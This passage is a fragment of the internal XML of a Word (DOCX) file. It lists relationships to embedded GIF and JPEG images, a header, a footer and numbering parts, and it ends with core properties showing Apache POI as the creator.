Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId24" Target="media/image20.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId25" Target="media/image21.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId26" Target="media/image22.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId27" Target="media/image23.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId28" Target="media/image24.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId29" Target="media/image25.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId3" Target="footer1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer"/><Relationship Id="rId30" Target="media/image26.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId31" Target="media/image27.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId32" Target="media/image28.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId33" Target="media/image29.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId34" Target="media/image30.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId35" Target="media/image31.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId36" Target="media/image32.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId37" Target="header1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header"/><Relationship Id="rId4" Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="media/image2.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="numbering.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering"/><Relationship Id="rId7" Target="media/image3.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="media/image4.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="media/image5.gif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2025-05-27T07:10:41Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>